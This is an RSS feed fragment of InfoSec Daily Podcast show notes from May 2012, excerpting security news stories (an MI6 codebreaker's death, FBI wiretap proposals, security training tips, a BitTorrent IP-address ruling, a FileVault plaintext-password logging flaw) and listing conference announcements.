<p><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">The body of Gareth Williams, a codebreaker with Britain’s MI6 spy agency, was discovered stuffed into a sports bag in his bathtub on Aug. 23, 2010, though he’s believed to have been killed Aug. 15.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Williams had just returned to London on Aug. 11 after spending six weeks in the United States, where he attended the annual Black Hat security conference in Las Vegas as part of a contingent of British spies, according to witnesses who spoke at the inquest. He attended Black Hat in 2008 as well.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">It’s believed Williams may have also attended Black Hat’s companion hacker conference, DefCon, which follows Black Hat and draws many of the same attendees. In 2010, Black Hat was held July 24 to 29, while DefCon ran from July 30 to Aug. 1.</span><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span>…</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:  </span><a href="http://news.cnet.com/8301-1009_3-57428067-83/fbi-we-need-wiretap-ready-web-sites-now/"><span>http://news.cnet.com/8301-1009_3-57428067-83/fbi-we-need-wiretap-ready-web-sites-now/</span></a></strong></p>
<p><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">The FBI is asking Internet companies not to oppose a controversial proposal that would require firms, including Microsoft, Facebook, Yahoo, and Google, to build in backdoors for government surveillance.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">In meetings with industry representatives, the White House, and U.S. senators, senior FBI officials argue the dramatic shift in communication from the telephone system to the Internet has made it far more difficult for agents to wiretap Americans suspected of illegal activities, CNET has learned.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">The FBI general counsel&#8217;s office has drafted a proposed law that the bureau claims is the best solution: requiring that social-networking Web sites and providers of VoIP, instant messaging, and Web e-mail alter their code to ensure their products are wiretap-friendly.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">&#8220;If you create a service, product, or app that allows a user to communicate, you get the privilege of adding that extra coding,&#8221; an industry representative who has reviewed the FBI&#8217;s draft legislation told CNET. The requirements apply only if a threshold of a certain number of users is exceeded, according to a second industry representative briefed on it.</span><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span>…</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:  </span><a href="http://www.cio.com/article/705760/Ten_Commandments_for_Effective_Security_Training"><span>http://www.cio.com/article/705760/Ten_Commandments_for_Effective_Security_Training</span></a></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Information security people think that simply making users aware of security issues will make them change their behavior. But security pros are learning the hard way that awareness rarely equals change.</span></strong></p>
<p><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">1. Serve small bites</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">People learn better when they can focus on small pieces of information that the mind can digest easily. It&#8217;s unreasonable to cover 55 different topics in 15 minutes of security training and expect someone to remember it all and then change their behavior.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Short bursts of training are always more effective.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">2. Reinforce lessons</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">People learn by repeating elements over time&#8211;without frequent feedback and opportunities for practice, even well-learned abilities go away. Security training should be an ongoing event, not a one-off seminar.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">3. Train in context</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">People tend to remember context more than content. In security training, it&#8217;s important to present lessons in the same context as the one in which the person is most likely to be attacked.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">4. Vary the message</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Concepts are best learned when they are encountered in many contexts and expressed in different ways. Security training that presents a concept to a user multiple times and in different phrasing makes the trainee more likely to relate it to past experiences and forge new connections.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">5. Involve your students</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">It&#8217;s obvious that when we are actively involved in the learning process, we remember things better. If a trainee can practice identifying phishing schemes and </span><a href="http://www.csoonline.com/article/220721/how-to-write-good-passwords"><span>creating good passwords</span></a><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">, improvement can be dramatic.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Sadly, hands-on learning still takes a backseat to old-school instructional models, including the dreaded lecture.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">6. Give immediate feedback</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">If you&#8217;ve ever played sports, it&#8217;s easy to understand this one. &#8220;Calling it at the point of the foul&#8221; creates teachable moments and greatly increases their impact. If a user falls for a company-generated attack and gets training on the spot, it&#8217;s highly unlikely they&#8217;ll fall for that trick again.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">7. Tell a story</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">When people are introduced to characters and narrative development, they often form subtle emotional ties to the material that helps keep them engaged. Rather than listing facts and data, use storytelling techniques. (Editor&#8217;s note: see, for example, </span><a href="http://www.csoonline.com/article/692551/how-to-rob-a-bank-a-social-engineering-walkthrough"><span>How to rob a bank</span></a><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">.)</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">8. Make them think</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">People need an opportunity to evaluate and process their performance before they can improve. Security awareness training should challenge people to examine the information presented, question its validity, and draw their own conclusions.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">9. Let them set the pace</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">It may sound cliche, but everyone really does learn at their own pace. A one-size-fits-all security training program is doomed to fail because it does not allow users to progress at the best speed for them.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">10. Offer conceptual and procedural knowledge</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Conceptual knowledge provides the big picture and lets a person apply techniques to solve a problem. Procedural knowledge focuses on the specific actions required to solve the problem.</span><br />
<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Combining the two types of knowledge greatly enhances users&#8217; understanding. For example, a user may need a procedural lesson to understand that an IP address included in a URL is an indication that they are seeing a phishing URL. However, they also need the conceptual understanding of all the parts of a URL to understand the difference between an IP address and a domain name, otherwise they may mistake something like www4.google.com for a phishing URL.</span><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span>…</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span>Source: </span><a href="https://torrentfreak.com/judge-an-ip-address-doesnt-identify-a-person-120503/"><span>https://torrentfreak.com/judge-an-ip-address-doesnt-identify-a-person-120503/</span></a></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">A landmark ruling in one of the many mass-BitTorrent lawsuits in the US has delivered a severe blow to a thus far lucrative business. New York Judge Gary Brown explains in great detail why an IP-address is not sufficient evidence to identify copyright infringers. According to the Judge this lack of specific evidence means that many alleged BitTorrent pirates have been wrongfully accused by copyright holders.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Mass-BitTorrent lawsuits have been dragging on for more than two years in the US, involving more than a quarter million alleged downloaders.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">The copyright holders who start these cases generally provide nothing more than an IP-address as evidence. They then ask the courts to grant a subpoena, allowing them to ask Internet providers for the personal details of the alleged offenders.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">The problem, however, is that the person listed as the account holder is often not the person who downloaded the infringing material. Or put differently; an IP-address is not a person.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Previous judges who handled BitTorrent cases have made observations along these lines, but none have been as detailed as New York Magistrate Judge Gary Brown was in a recent order.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">In his recommendation order the Judge labels mass-BitTorrent lawsuits a “waste of judicial resources.” For a variety of reasons he recommends other judges to reject similar cases in the future.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">The Judge continues by arguing that having an IP-address as evidence is even weaker than a telephone number, as the majority of US homes have a wireless network nowadays. This means that many people, including complete strangers if one has an open network, can use the same IP-address simultaneously.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">In other words, the copyright holders in these cases have wrongfully accused dozens, hundreds, and sometimes thousands of people.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Aside from effectively shutting down all mass-BitTorrent lawsuits in the Eastern District of New York, the order is a great reference for other judges dealing with similar cases.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span>…</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:  </span><a href="http://cryptome.org/2012/05/apple-filevault-hole.htm"><span>http://cryptome.org/2012/05/apple-filevault-hole.htm</span></a></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">As someone said here recently, carefully built crypto has a unfortunate tendency to consist of three thick impregnable walls and a picket fence in the back with the gate left open.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">That seems to have happened to Apple&#8217;s older (&#8220;legacy&#8221;) Filevault in the current release of MacOX Lion (10.7.3)&#8230;. something intended to protect sensitive information stored on laptops by providing for encrypted user home directories contained in an encrypted file system mounted on top of the user&#8217;s home directory.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Someone, for some unknown reason, turned on a debug switch (DEBUGLOG) in the current released version of MacOS Lion 10.7.3 that causes the authorizationhost process&#8217;s HomeDirMounter DIHLFVMount to log in *PLAIN TEXT* in a system wide logfile readible by anyone with root or admin access the login password of the user of an encrypted home directory tree (&#8220;legacy Filevault&#8221;).</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">The log in question is kept by default for several weeks&#8230;</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Thus anyone who can read files accessible to group admin can discover the login passwords of any users of legacy (pre LION) Filevault home directories who have logged in since the upgrade to 10.7.3 in early February 2012.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span>…</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">[end]</span></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-661-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3899/0/infosec-daily-podcast-episode-661.mp3" length="21827500" type="audio/mpeg" />
		<itunes:duration>0:45:28</itunes:duration>
		<itunes:subtitle>&#160;
Episode 661 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 661 for May 5, 2012.  Tonight&#8217;s podcast is hosted by Dr. Bonez and Themson Mester.


Guests: oncee and spridel


Announcements
GraniteSec (formerly The New[...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 661 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 661 for May 5, 2012.  Tonight&#8217;s podcast is hosted by Dr. Bonez and Themson Mester.


Guests: oncee and spridel


Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
When:  May 19, 2012
Where:  Veasey Memorial Park, Groveland, MA
http://granitesec.org


AIDE 2012
When: May 21-25, 2012
Where: MU Forensic Science Center &#8211; Huntington, West Virginia
http://www.appyide.org/


LayerOne 2012
When: May 26-27, 2012
Where: Clarion Hotel &#8211; Anaheim, CA
http://www.layerone.org


Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
Where: Courtyard Seattle Federal Way, WA 
http://www.sans.org/mentor/details.php?nid=28014


Social Engineering Training
When: July 21-24, 2012
Where: Black Hat Vegas
When: August 20-24, 2012
Where:  Bristol, UK
When:  November 12-16, 2012
Where:  Columbia, MD
http://www.social-engineer.com/social-engineer-training


Inside and Out of the Social-Engineer Toolkit (SET)
When: July 21 &#8211; 22, 2012
When: July 23 &#8211; 24, 2012
Where: Black Hat Vegas
http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html


DerbyCon 2012 &#8211; The “Deuce” Reunion
When:  September 27-30, 2012
Where: Louisville, KY
http://www.derbycon.com


Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
http://hack3rcon.org/


Skydogcon
When: October 26-28
Where: Hotel Preston in Nashville, TN 
http://www.skydogcon.com


Please consider making your Amazon purchases through our affiliate link.  If you’re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
Or simply use our QR Code Links.
Amazon:
Amazon UK:
You don't have a sufficient version of Flash Player to display this animation.


Stories
Source:  http://www.wired.com/threatlevel/2012/05/mi6-codebreaker-at-blackhat/
A top British codebreaker who died a mysterious death in his flat two years ago had just returned from a computer security conference in the United States before his death, according to information disclosed during an inquest this week.
The body of Gareth Williams, a codebreaker with Britain’s MI6 spy agency, was discovered stuffed into a sports bag in his bathtub on Aug. 23, 2010, though he’s believed to have been killed Aug. 15.
Williams had just returned to London on Aug. 11 after spending six weeks in the United States, where he attended the annual Black Hat security conference in Las Vegas as part of a contingent of British spies, according to witnesses who spoke at the inquest. He attended Black Hat in 2008 as well.
It’s believed Williams may have also attended Black Hat’s companion hacker conference, DefCon, which follows Black Hat and draws many of the same attendees. In 2010, Black Hat was held July 24 to 29, while DefCon ran from July 30 to Aug. 1.

…
Source:  http://news.cnet.com/8301-1009_3-57428067-83/fbi-we-need-wiretap-ready-web-sites-now/
The FBI is asking Internet companies not to oppose a controversial proposal that would require firms, including Microsoft, Facebook, Yahoo, and Google, to build in backdoors for government surveillance.
In meetings with industry representatives, the White House, and U.S. senators, senior FBI officials argue the dramatic shift in communication from the telephone system to the Internet has made it far more difficult for agents to wiretap Americans suspected of illegal activities, CNET has learned.
The FBI general counsel&#8217;s office has drafted a proposed law that the bureau claims is the best solution: requiring that social-networking Web sites and providers of VoIP, instant messaging, and Web e-mail alter their code to ensure their products are wiretap-friendly.
&#8220;If you create a service, product, or app that allows a user to communicate, you get the privilege of adding that extra coding,&#8221; an industry representative who has r[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 660 &#8211; Beginning of the End?, Flash 0day, No Oracle Patch, SMISHing, and Lotsa Arrest</title>
		<link>http://www.isdpodcast.com/episode-660-beginning-of-the-end-flash-0day-no-oracle-patch-smishing-and-lotsa-arrest</link>
		<comments>http://www.isdpodcast.com/episode-660-beginning-of-the-end-flash-0day-no-oracle-patch-smishing-and-lotsa-arrest#comments</comments>
		<pubDate>Sat, 05 May 2012 00:54:21 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3893</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 660 for May 4, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez. Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012 Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center &#8211; Huntington, [...]]]></description>
			<content:encoded><![CDATA[<p><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 660 for May 4, 2012. &nbsp;</span><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.</span></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Announcements</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /><br />
	</span><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;May 19, 2012<span class="Apple-tab-span" style="white-space: pre; "> </span><br class="kix-line-break" /><br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /><br />
	</span><a href="http://granitesec.org/"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://granitesec.org</span></a></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.appyide.org/</span></a></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.layerone.org</span></a></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=28014</span></a></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Social Engineering Training</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.derbycon.com</span></a></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Hack3rCon^3</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: October 19-21, 2012</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Where: Charleston, WV <br class="kix-line-break" /><br />
	</span><a href="http://hack3rcon.org/"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://hack3rcon.org/</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Skydogcon<br class="kix-line-break" /><br />
	</span><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.skydogcon.com</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Please consider making your Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Or simply use our QR Code Links.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon:</span><img height="135px;" src="https://lh3.googleusercontent.com/xlLXpk-obTMSEA24lHI32DVXZ4t0IcYBkr8TVhEXyJ1EYKymgv4yAB6kgpmFcS-rlg-SenOtIi8qkYOFBYEUGOv7Qwz55aow5TtzuEMUmnU5gdFyaS8" width="135px;" /></b></p>
